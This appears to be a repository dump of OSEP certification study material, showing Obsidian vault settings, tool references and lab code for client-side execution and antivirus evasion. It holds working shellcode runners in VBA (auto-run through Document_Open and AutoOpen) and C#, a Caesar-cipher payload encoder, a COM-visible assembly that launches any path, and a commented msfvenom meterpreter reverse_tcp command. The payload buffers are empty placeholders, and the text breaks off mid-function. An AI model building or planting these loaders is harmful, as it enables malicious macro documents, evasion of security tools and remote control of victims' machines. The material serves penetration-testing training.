├── .obsidian ├── hotkeys.json ├── appearance.json ├── app.json ├── plugins │ ├── table-editor-obsidian │ │ ├── data.json │ │ ├── manifest.json │ │ └── styles.css │ ├── obsidian-mind-map │ │ └── manifest.json │ ├── calendar │ │ ├── data.json │ │ └── manifest.json │ ├── obsidian-git │ │ ├── manifest.json │ │ ├── data.json │ │ └── styles.css │ ├── better-word-count │ │ ├── manifest.json │ │ ├── styles.css │ │ └── data.json │ └── obsidian-image-toolkit │ │ ├── manifest.json │ │ └── styles.css ├── community-plugins.json ├── themes │ └── Things │ │ └── manifest.json ├── core-plugins.json ├── graph.json ├── vault-stats.json ├── core-plugins-migration.json ├── workspace └── workspace.json ├── Tools ├── DotNetToJScript │ ├── NDesk.Options.dll │ └── DotNetToJScript.exe ├── SharpShooter │ ├── requirements.txt │ └── SharpShooter.py └── AV Evasion │ └── Find-AVSignature.ps1 ├── Advanced Antivirus Evasion ├── images │ ├── AMSI │ │ ├── onEnter.png │ │ ├── onLeave.png │ │ ├── flowchart.png │ │ ├── handlers.png │ │ ├── frida-trace.png │ │ ├── mal-string.png │ │ ├── new-process.png │ │ ├── split-bypass.png │ │ ├── test-string.png │ │ ├── random-string.png │ │ ├── current-process.png │ │ └── amsi-scan-buffer-handler.png │ └── Windbg │ │ ├── 32-bit.png │ │ ├── 64-bit.png │ │ ├── modify-stack.png │ │ ├── breakpoint-hit.png │ │ ├── detailed-view.png │ │ ├── search-process.png │ │ ├── view-registers.png │ │ ├── windbg-search.png │ │ ├── create-breakpoint.png │ │ ├── view-7-instructions.png │ │ └── move-through-instructions.png └── README.md ├── Client-Side-Code-Execution-With-Office └── images │ ├── vba-editor.png │ ├── trust-center-default.png │ └── trust-center-protected.png ├── Client-Side-Execution-With-Windows-Script-Host ├── images │ ├── msfvenom.png │ ├── DotNetToJscript.png │ └── JscriptShellcode.png ├── Compiled binaries │ ├── HelloWorld.exe │ ├── MessageBox.exe │ ├── ExampleAssembly.dll │ ├── JscriptShellcode.dll │ ├── ReflectiveLoad.dll │ └── ShellcodeRunner.exe ├── C# 
Programs │ ├── HelloWorld.cs │ ├── ExampleAssembly.cs │ ├── MessageBox.cs │ ├── JscriptShellcode.cs │ ├── ShellcodeRunner.cs │ └── ReflectiveLoad.cs ├── README.md └── JScript │ ├── ExampleAssembly.js │ └── JscriptShellcode.js ├── LICENSE ├── Antivirus Evasion ├── VBA Scripts │ └── ShellcodeRunner.vba ├── C# Programs │ ├── vba_encrypt.cs │ ├── ShellcodeRunner.cs │ ├── XorEncoder.cs │ └── CaesarEncoder.cs └── README.md ├── Process Injection and Migration ├── C# Programs │ ├── process-injection.cs │ └── dll-injection.cs └── README.md ├── README.md └── Operating-System-and-Programming-Fundamentals └── README.md /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | {} -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "accentColor": "#a667da", 3 | "cssTheme": "Things" 4 | } -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "attachmentFolderPath": "Advanced Antivirus Evasion/images/AMSI" 3 | } -------------------------------------------------------------------------------- /Tools/DotNetToJScript/NDesk.Options.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Tools/DotNetToJScript/NDesk.Options.dll -------------------------------------------------------------------------------- /Tools/SharpShooter/requirements.txt: -------------------------------------------------------------------------------- 1 | jsmin==2.2.2 --hash=sha256:b6df99b2cd1c75d9d342e4335b535789b8da9107ec748212706ef7bbe5c2553b -------------------------------------------------------------------------------- /Tools/DotNetToJScript/DotNetToJScript.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Tools/DotNetToJScript/DotNetToJScript.exe -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/onEnter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/onEnter.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/onLeave.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/onLeave.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/flowchart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/flowchart.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/handlers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/handlers.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/32-bit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/32-bit.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/64-bit.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/64-bit.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/frida-trace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/frida-trace.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/mal-string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/mal-string.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/new-process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/new-process.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/split-bypass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/split-bypass.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/test-string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/test-string.png -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "formatType": "normal", 3 | 
"showRibbonIcon": true, 4 | "bindEnter": true, 5 | "bindTab": true 6 | } -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/random-string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/random-string.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/modify-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/modify-stack.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/current-process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/current-process.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/breakpoint-hit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/breakpoint-hit.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/detailed-view.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/detailed-view.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/search-process.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/search-process.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/view-registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/view-registers.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/windbg-search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/windbg-search.png -------------------------------------------------------------------------------- /Client-Side-Code-Execution-With-Office/images/vba-editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Code-Execution-With-Office/images/vba-editor.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/create-breakpoint.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/create-breakpoint.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/view-7-instructions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/view-7-instructions.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/AMSI/amsi-scan-buffer-handler.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/AMSI/amsi-scan-buffer-handler.png -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/images/msfvenom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/images/msfvenom.png -------------------------------------------------------------------------------- /Advanced Antivirus Evasion/images/Windbg/move-through-instructions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Advanced Antivirus Evasion/images/Windbg/move-through-instructions.png -------------------------------------------------------------------------------- /Client-Side-Code-Execution-With-Office/images/trust-center-default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Code-Execution-With-Office/images/trust-center-default.png -------------------------------------------------------------------------------- /Client-Side-Code-Execution-With-Office/images/trust-center-protected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Code-Execution-With-Office/images/trust-center-protected.png -------------------------------------------------------------------------------- /.obsidian/community-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "table-editor-obsidian", 3 | "calendar", 4 | "better-word-count", 5 | "obsidian-image-toolkit", 6 | "obsidian-mind-map", 7 | "obsidian-git" 8 | ] 
-------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/images/DotNetToJscript.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/images/DotNetToJscript.png -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/images/JscriptShellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/images/JscriptShellcode.png -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/HelloWorld.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/HelloWorld.exe -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/MessageBox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/MessageBox.exe -------------------------------------------------------------------------------- /.obsidian/themes/Things/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Things", 3 | "version": "2.1.9", 4 | "minAppVersion": "1.0.0", 5 | "author": "@colineckert", 6 | "authorUrl": "https://twitter.com/colineckert" 7 | } 8 | -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled 
binaries/ExampleAssembly.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ExampleAssembly.dll -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/JscriptShellcode.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/JscriptShellcode.dll -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ReflectiveLoad.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ReflectiveLoad.dll -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ShellcodeRunner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cipher7/OSEP/HEAD/Client-Side-Execution-With-Windows-Script-Host/Compiled binaries/ShellcodeRunner.exe -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-mind-map/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-mind-map", 3 | "name": "Mind Map", 4 | "version": "1.1.0", 5 | "description": "A plugin to preview notes as Markmap mind maps", 6 | "isDesktopOnly": false, 7 | "js": "main.js" 8 | } -------------------------------------------------------------------------------- /.obsidian/plugins/calendar/data.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "shouldConfirmBeforeCreate": true, 3 | "weekStart": "locale", 4 | "wordsPerDot": 250, 5 | "showWeeklyNote": false, 6 | "weeklyNoteFormat": "", 7 | "weeklyNoteTemplate": "", 8 | "weeklyNoteFolder": "", 9 | "localeOverride": "system-default" 10 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-git", 3 | "name": "Obsidian Git", 4 | "description": "Backup your vault with Git.", 5 | "isDesktopOnly": false, 6 | "fundingUrl": "https://ko-fi.com/vinzent", 7 | "js": "main.js", 8 | "version": "2.20.0" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/better-word-count/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "better-word-count", 3 | "name": "Better Word Count", 4 | "version": "0.9.6", 5 | "description": "Counts the words of selected text in the editor.", 6 | "author": "Luke Leppan", 7 | "authorUrl": "https://lukeleppan.com", 8 | "isDesktopOnly": false 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/calendar/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "calendar", 3 | "name": "Calendar", 4 | "description": "Calendar view of your daily notes", 5 | "version": "1.5.10", 6 | "author": "Liam Cain", 7 | "authorUrl": "https://github.com/liamcain/", 8 | "isDesktopOnly": false, 9 | "minAppVersion": "0.9.11" 10 | } 11 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-image-toolkit/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": 
"obsidian-image-toolkit", 3 | "name": "Image Toolkit", 4 | "version": "1.3.1", 5 | "minAppVersion": "0.2.0", 6 | "description": "This plugin provides some image viewing toolkit.", 7 | "author": "sissilab", 8 | "authorUrl": "https://github.com/sissilab", 9 | "isDesktopOnly": true 10 | } 11 | -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "outgoing-link", 9 | "tag-pane", 10 | "page-preview", 11 | "daily-notes", 12 | "templates", 13 | "note-composer", 14 | "command-palette", 15 | "editor-status", 16 | "bookmarks", 17 | "outline", 18 | "word-count", 19 | "file-recovery" 20 | ] -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/HelloWorld.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace HelloWorld
{
    /// <summary>
    /// Minimal console program used as a sanity-check compile/run target before the
    /// DotNetToJScript exercises; it prints a fixed greeting and exits.
    /// </summary>
    class Program
    {
        /// <summary>Entry point: writes "Hello World!" to standard output.</summary>
        /// <param name="args">Command-line arguments (ignored).</param>
        static void Main(string[] args)
        {
            const string greeting = "Hello World!";
            Console.Out.WriteLine(greeting);
        }
    }
}
-------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "table-editor-obsidian", 3 | "name": "Advanced Tables", 4 | "author": "Tony Grosinger", 5 | "authorUrl": "https://grosinger.net", 6 | "description": "Improved table navigation, formatting, manipulation, and formulas", 7 | "isDesktopOnly": false, 8 | "minAppVersion": "1.0.0", 9 | "version": "0.18.1", 10 | "js": "main.js", 11 | "donation": "https://buymeacoffee.com/tgrosinger" 12 | }
-------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/ExampleAssembly.cs: --------------------------------------------------------------------------------
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;

/// <summary>
/// COM-visible test assembly for the DotNetToJScript exercise: the generated
/// JScript loader instantiates this class (which pops a message box) and can then
/// call <see cref="RunProcess"/>. Because the class is <c>[ComVisible]</c>, any
/// script host that can load the serialized assembly gets an unvalidated
/// "launch this path" primitive - lab/demo code only.
/// </summary>
[ComVisible(true)]
public class TestClass
{
    private const string BannerText = "Test";
    private const string BannerCaption = "Test";

    /// <summary>Shows a "Test" exclamation dialog as visible proof the assembly ran.</summary>
    public TestClass()
    {
        ShowBanner();
    }

    /// <summary>
    /// Starts whatever <paramref name="path"/> names. The value is passed straight to
    /// <see cref="Process.Start(string)"/> with no validation, so the caller fully
    /// controls what gets executed.
    /// </summary>
    /// <param name="path">File to launch.</param>
    public void RunProcess(string path)
    {
        Process.Start(path);
    }

    // Kept separate so the constructor reads as a single step.
    private static void ShowBanner()
    {
        MessageBox.Show(BannerText, BannerCaption, MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
    }
}
-------------------------------------------------------------------------------- /.obsidian/plugins/better-word-count/styles.css: -------------------------------------------------------------------------------- 1 | details.bwc-sb-item-setting { 2 | border: 1px solid var(--background-modifier-border); 3 | border-radius: 10px; 4 | padding: 10px 5px 20px 10px; 5 | margin-top: 5px; 6 | margin-bottom: 10px; 7 | } 8 | .bwc-sb-item-setting summary::marker { 9 | font-size: 10px; 10 | } 11 | 12 | /* .bwc-sb-item-setting summary { */ 13 | /* margin-bottom: 5px; */ 14 | /* } */ 15 | .bwc-sb-item-setting summary span.bwc-sb-buttons { 16 | float: right; 17 | } 18 | 19 | .bwc-status-bar-settings-title { 20 | margin-bottom: 0px; 21 | } 22 | -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18
| "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 1, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/plugins/better-word-count/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "statusBar": [ 3 | { 4 | "prefix": "", 5 | "suffix": " words", 6 | "metric": { 7 | "type": 0, 8 | "counter": 0 9 | } 10 | }, 11 | { 12 | "prefix": " ", 13 | "suffix": " characters", 14 | "metric": { 15 | "type": 0, 16 | "counter": 1 17 | } 18 | } 19 | ], 20 | "altBar": [ 21 | { 22 | "prefix": "", 23 | "suffix": " files", 24 | "metric": { 25 | "type": 2, 26 | "counter": 6 27 | } 28 | } 29 | ], 30 | "countComments": false, 31 | "collectStats": true, 32 | "pageWords": 300 33 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/MessageBox.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace MessageBox
{
    /// <summary>
    /// Smallest possible P/Invoke example: calls user32!MessageBox directly instead
    /// of going through System.Windows.Forms. Used to confirm the toolchain before
    /// the shellcode runners that P/Invoke kernel32.
    /// </summary>
    class Program
    {
        /// <summary>user32 MessageBox; CharSet.Auto selects the A/W variant for the platform.</summary>
        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);

        /// <summary>Entry point: shows one dialog with no owner window and the default (MB_OK) style.</summary>
        /// <param name="args">Command-line arguments (ignored).</param>
        static void Main(string[] args)
        {
            IntPtr noOwner = IntPtr.Zero;
            string body = "This is my text";
            string title = "This is my caption";
            int defaultStyle = 0; // MB_OK
            MessageBox(noOwner, body, title, defaultStyle);
        }
    }
}
-------------------------------------------------------------------------------- /.obsidian/vault-stats.json: -------------------------------------------------------------------------------- 1 |
{"history":{"2023-05-31":{"words":0,"characters":0,"sentences":0,"pages":0,"files":0,"footnotes":0,"citations":0,"totalWords":13191,"totalCharacters":94006,"totalSentences":568,"totalFootnotes":0,"totalCitations":0,"totalPages":44},"2023-06-01":{"words":70,"characters":444,"sentences":1,"pages":0.20000000000000018,"files":7,"footnotes":0,"citations":0,"totalWords":13261,"totalCharacters":94449,"totalSentences":569,"totalFootnotes":3264,"totalCitations":3264,"totalPages":44.2}},"modifiedFiles":{"Advanced Antivirus Evasion/README.md":{"words":{"initial":1291,"current":1361},"characters":{"initial":8856,"current":9300},"sentences":{"initial":67,"current":68},"footnotes":{"initial":0,"current":0},"citations":{"initial":0,"current":0},"pages":{"initial":4.3,"current":4.5}}}} -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "outgoing-link": true, 8 | "tag-pane": true, 9 | "page-preview": true, 10 | "daily-notes": true, 11 | "templates": true, 12 | "note-composer": true, 13 | "command-palette": true, 14 | "slash-command": false, 15 | "editor-status": true, 16 | "starred": true, 17 | "markdown-importer": false, 18 | "zk-prefixer": false, 19 | "random-note": false, 20 | "outline": true, 21 | "word-count": true, 22 | "slides": false, 23 | "audio-recorder": false, 24 | "workspaces": false, 25 | "file-recovery": true, 26 | "publish": false, 27 | "sync": false, 28 | "canvas": true, 29 | "bookmarks": true 30 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Cipher7 4 | 5 | Permission is hereby granted, free of charge, to any person 
obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
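22 | -------------------------------------------------------------------------------- /Antivirus Evasion/VBA Scripts/ShellcodeRunner.vba: --------------------------------------------------------------------------------
' Lab-only VBA shellcode runner (OSEP course material). Allocates an RWX buffer,
' copies the byte array into it one byte at a time and starts a thread at its
' first byte. The VirtualAlloc(RWX) / RtlMoveMemory / CreateThread trio is the
' pattern AV signatures and AMSI commonly flag; see the module README.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

' Copies buf into freshly allocated executable memory and runs it on a new thread.
' Returns nothing useful; the thread handle is neither waited on nor closed.
' Bails out silently if VirtualAlloc fails rather than writing through a null pointer.
Function mymacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim bufSize As Long

    ' Placeholder values only - replace with real shellcode. Each element must be
    ' 0..255: RtlMoveMemory copies a single byte, so anything larger is truncated.
    buf = Array(123,23,332,323,232) 'Shellcode'

    ' Element count, not the last index: UBound alone is one byte short.
    bufSize = UBound(buf) - LBound(buf) + 1

    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    addr = VirtualAlloc(0, bufSize, &H3000, &H40)
    If addr = 0 Then Exit Function

    ' Offset from LBound so the copy is correct even under Option Base 1.
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + (counter - LBound(buf)), data, 1)
    Next counter

    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

' Word auto-run hooks: both names fire so the macro runs regardless of document type.
Sub Document_Open()
    mymacro
End Sub

Sub AutoOpen()
    mymacro
End Sub
-------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/vba_encrypt.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Program 8 | { 9 | public class vba_encrypt // Caesar Cipher Encryption 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[0] { }; 15 | byte[] encoded = new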
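byte[buf.Length]; 16 | for(int i = 0; i < buf.Length; i++) 17 | { 18 | encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF); // shift of 2 19 | } 20 | uint counter = 0; 21 | 22 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 23 | foreach(byte b in encoded) 24 | { 25 | hex.AppendFormat("{0:D}, ", b); 26 | counter++; 27 | if(counter % 50 == 0) 28 | { 29 | hex.AppendFormat("_{0}", Environment.NewLine); 30 | } 31 | } 32 | Console.WriteLine("The payload is: " + hex.ToString()); 33 | } 34 | } 35 | } -------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/ShellcodeRunner.cs: --------------------------------------------------------------------------------
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace ConsoleApp1
{
    /// <summary>
    /// Lab-only in-process shellcode runner (OSEP course material): copies a byte
    /// array into a fresh RWX allocation and executes it on a new thread, then waits
    /// for that thread. The VirtualAlloc(RWX) -> copy -> CreateThread sequence is
    /// the textbook pattern AV/EDR rules commonly flag; nothing here tries to hide it.
    /// </summary>
    class ShellcodeRunner
    {
        // MEM_COMMIT | MEM_RESERVE and PAGE_EXECUTE_READWRITE (kernel32 constants).
        private const uint MemCommitReserve = 0x3000;
        private const uint PageExecuteReadWrite = 0x40;
        // WaitForSingleObject INFINITE.
        private const uint Infinite = 0xFFFFFFFF;

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        /// <summary>Entry point. Paste the msfvenom output into <c>buf</c> before building.</summary>
        /// <param name="args">Command-line arguments (ignored).</param>
        static void Main(string[] args)
        {
            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp
            byte[] buf = new byte[0] { };
            if (buf.Length == 0)
            {
                // With an empty buffer VirtualAlloc(0) fails and Marshal.Copy throws
                // on the null destination; say why instead of crashing.
                Console.Error.WriteLine("No shellcode in buf - paste the msfvenom output first.");
                return;
            }
            Run(buf);
        }

        /// <summary>
        /// Allocates an RWX region sized to the payload, copies it in, starts a thread
        /// at its first byte and blocks until that thread exits.
        /// </summary>
        /// <param name="shellcode">Position-independent code to execute; must be non-empty.</param>
        /// <exception cref="Win32Exception">VirtualAlloc or CreateThread failed.</exception>
        static void Run(byte[] shellcode)
        {
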